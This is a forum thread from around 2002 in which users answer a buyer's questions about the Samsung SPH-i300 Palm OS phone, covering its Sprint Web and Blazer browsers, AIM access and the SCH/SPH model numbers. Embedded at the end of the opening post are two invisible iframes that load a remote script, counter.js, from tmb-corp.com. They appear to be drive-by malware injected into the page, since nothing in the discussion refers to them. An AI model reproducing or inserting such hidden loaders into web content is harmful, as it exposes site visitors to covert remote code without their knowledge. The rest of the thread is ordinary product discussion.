+ Reply to Thread

Thread: Quick Question

Quick Question

Im thinking of buying an SPH i300....and before that i wanted the Sanyo SCP-5000, and before that i wanted a Compaq iPaq....the thing im most concerned about is the wireless internet capability..not so much full-function browsing as i am for quick messages and scores...another thing i want to know is if i cna use AOL Instant Messenger on this phone, because i will also be using that frequently if it can be used on the i300...if so, how do i go about getting AiM on my i300?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The I300 is shipped with 2 web browsers already programmed. The default, sprint web, and an additional Blazer. AOL is available through the Sprint web and is quite simple to navigate. The ISP's really tend to work well with the I300. I've often posted remarks on this page from mine. So to answer your ?'s

1. Wireless capability isn't an issue. Examine the other features of the phone and make your decision upon that. The wireless capabilities are plentiful.

2. The instant messanger is also not an issue. Its there and a lot of owners use the service. I had MSN updates but recently cancelled them. No biggie!

thanks for the a's is AiM built into the phone?

ive played with the phone a bit, and felt its weight and i like how it fits nicely into the palm, some might argue its big because they are used to smaller tiny phones with buttons much too small to use...etc.. i must admit i have an okia 8290, and i like its size, although the 1300 isnt much bigger, and is way way more plentiful in functionality.....i was just asking these questions so as not to be surprised later, because ive already decided on buying this phone...

and sprint is the only provider currently, correct?

any pages you cna reccomend for this phone?

also, are the SCH and SPH-1300 phones the same thing?

Ask all the questions you need friend! This is a great place to do just that. Yes, AIM is already on the phone on the Sprint web. It's one of the options in the web portals menu. So I guess, technically, its not built into the phone, but no addt'l software is needed to use it. Sprint is the only current provider though Verizon will supposedly be releasing sometime soon.

I was thinking of the ipac as well but to have wireless capability and a phone to go along with it is great. You will enjoy your Samsung phone/pda much more then the Ipaq and the wonderful(sarcasm) windows ce that is on it.

yeah, the iPaq was looking very nice until i saw the price tag...$600 but i figure since im due for a new phone anyway, might as get both in one about 3 years ago i had a Philips Nino300 B&W PDA with windows CE, i have no problems with that OS, in fact i prefer it....but since i havent really had the chance to give the Palm OS a good whirl, the i300 will give me just that.

and thank you much for answering my questions..i was browsing back topics and found some of the answers

also anyone have the answer to this q:

"also, are the SCH and SPH-i300 phones the same thing?"

because while browsing circuit city's website, this is the phone they have in stock for sprint...and its available for pickup at both Circuit Cityl ocations near me.....but then i check out the Sprint site and htey have hte SPH-i300....are they the same?

Administrator

Arrow

sch and sph are the same phones... samsung decided to change the model number (or it might have been sprint).

The Sprint browser does have AIM built into it, but i found it to be annoying to use. You can go to aol.com and somewhere on there is a link for aol by pda. You can download the AOL program for palm users where you can check mail, send mail, buddy list, basic aol stuff like that. There is also an AIM program you can download that is 100X better than the one inside the sprint web. If you don't want to use up space with these programs you can just use the ones through the sprint wireless web.

i would need this right?

http://www.aim.com/get_aim/palm/latest_palm.adp

thats the AiM for Palm PDA....and it owuld be compatible, sicnethe SPH runs off of the same Palm O.S.?

yeah, it will work fine

Administrator

Arrow

to save space, try the sprint web pqa...

smartphonecentral.com
    Good answers by all. Cicada, I've found all the IM apps for Palm OS (and therefore the i300) to be very strong: AOL's IM, MSN (via the excellent Messenger Force from Ruksun), and Yahoo! Messenger. I consider them to be somewhat of "killer apps" for any wireless Internet device, and they all work very well.

AOL even supports smileys...

Cheers!

--Jesse

P.S. One clever technique (mentioned earlier on this board) is to use the SprintWeb AIM client to connect and login, and then disconnect the call. You'll still appear as "logged in" to AIM buddies, and if anybody sends you a message, you'll get a text message on your phone! You can then launch the AIM client and carry on a conversation. I believe you have to reset the whole procedure when you sign off after a conversation though.
    Last edited by wHo_tHe; 01-09-2002 at 12:09 AM.

Basically the "Sprint Web" browser is a WAP browser, very much like the one that is available on most other Sprint Web enabled phone. I like the WAP browser for certain things also, especially checking sports scores. It tends to be faster because it is only text based. The Blazer browser is good also for other times you need to see a real Web page. One thing I have found with the Blazer browser is that it does not work if you are not trying to view an Internet web page. For instance, I have the need to dial directly into a customer's network via a RAS server. Then I use a web browser to configure/check certains pieces of equipment (RF controllers, printers, etc). I have a 3rd browser (Eudora Web) that I use for those functions. I guess it has to do with the Blazer browser trying to connect to Handsprings Blazer proxy server.

As far as AIM goes, the AIM client that you download from AOL is MUCH better than using the AIM fuction built into the WAP browser. However, be aware that I (and others on the i300 and the Kyo 6035) have had compatibiltiy problems with AIM and it has caused our phones to crash and require a hard reset. (took off AIM and the problem went away). The AIM client that actually runs on your phone will also require you to be dialed in and use plan minutes. The WAP AIM will not (as mentioned above)
    Carl